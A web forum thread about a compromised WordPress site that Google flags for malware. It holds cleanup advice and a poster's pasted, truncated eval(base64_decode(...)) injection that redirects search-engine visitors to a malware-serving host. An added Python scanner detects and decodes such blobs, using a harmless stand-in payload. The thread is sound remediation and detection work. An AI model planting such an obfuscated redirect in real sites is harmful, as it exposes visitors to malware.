
Google says my site contains malware

@Deb1703797

Posted in: #Hacking #Malware

My client's site: bit.ly/dTOfGF (I used a URL shortener).

I have tried everything to find the malware but I couldn't.

I tried the Google checklist: googlewebmastercentral.blogspot.com/2007/09/quick-security-checklist-for-webmasters.html
I checked for all script files in multiple browsers and couldn't find any...

The strange thing is that Google reports that PNG files and 1 CSS file have malware...

Any help would be appreciated.

Thanks!


3 Comments


@Angela700

It's more than likely your WordPress install has been compromised.

The permanent fix is to follow these steps to ensure it is fully cleaned and to prevent a recurrence. This is the best method to ensure it is 100% clean.


1. Back up the database.
2. Make a note of the customizations, such as plugins or any other modifications you've made.
3. Remove all files from the site; be sure to save anything that isn't part of WordPress!
4. Reinstall WordPress.
5. Restore the database.
6. Verify the WordPress users are correct and authorized.
7. Re-install any plugins you were using.
8. Reload any additional .php files from a known clean copy.


This is the best way to ensure the site was not attacked previously and has hidden backdoors loaded deep into the site.

It is extremely important to keep your WordPress software up to date and use strong passwords for your WP admin, FTP and Database, and that you don’t use the same password for all of them.

Additional information: GoDaddy case study


@Deb1703797

This was in a PHP file that had chmod 666:

eval(base64_decode("[...] FRU UF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));


It only showed when it was visited through Google, Yahoo or Bing, so I couldn't have seen the malware...


@Sarah324

Remake those images, maybe even using screenshots, and re-save them and replace them in your site. Any malware hidden in them will be removed that way.

Update

That snippet contained code that, if a user found your site through Google, Yahoo, or Bing search, redirected users to a site in Poland that serves up a fake search page and tries to load malware onto a user's computer.

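Added example, not code from any poster in this thread: a read-only scan of a site tree for the pattern found above, a PHP file containing eval(base64_decode(...)). It reports whether each hit is world-writable (as with chmod 666) and decodes the blob for reading without executing it. The sample tree, the file names and the redirect.example URL are constructed for the demonstration.

```python
import base64, os, re, stat, tempfile

# Matches eval(base64_decode("...")) with either quote style; captures the blob.
INJECT_RE = re.compile(r"""eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)\s*\)""")
# Strings that indicate a search-referrer-conditional redirect once decoded.
MARKERS = ("HTTP_REFERER", "Location:", "google", "yahoo", "bing")

def decode_blob(blob):
    """Decode for reading only; the result is never executed."""
    cleaned = re.sub(r"\s+", "", blob)
    cleaned += "=" * (-len(cleaned) % 4)  # tolerate stripped padding
    return base64.b64decode(cleaned).decode("latin-1")

def scan_tree(root):
    """Return one finding per injected blob in .php files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in (n for n in files if n.lower().endswith(".php")):
            path = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.stat(path).st_mode)
            with open(path, "r", encoding="latin-1") as fh:
                text = fh.read()
            for m in INJECT_RE.finditer(text):
                decoded = decode_blob(m.group(1))
                findings.append({
                    "path": path,
                    "world_writable": bool(mode & stat.S_IWOTH),
                    "markers": [k for k in MARKERS if k.lower() in decoded.lower()],
                    "decoded": decoded,
                })
    return findings

def build_sample(root):
    """Constructed tree: one clean file, one file carrying a harmless stand-in blob."""
    payload = 'if (preg_match("/google|yahoo|bing/", $_SERVER["HTTP_REFERER"])) { header("Location: http://redirect.example/"); exit(); }'
    blob = base64.b64encode(payload.encode()).decode()
    bad = os.path.join(root, "footer.php")
    with open(bad, "w") as fh:
        fh.write('<?php eval(base64_decode("%s")); ?>\n' % blob)
    os.chmod(bad, 0o666)  # same permissions as the file described in the thread
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    return bad

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for f in scan_tree(tmp):
            print(f["path"], "o+w:", f["world_writable"], f["markers"], f["decoded"])
```

Run against a copy of the docroot rather than the live site, and treat any hit as a reason to follow the clean-reinstall steps above, since other backdoors may use different encodings.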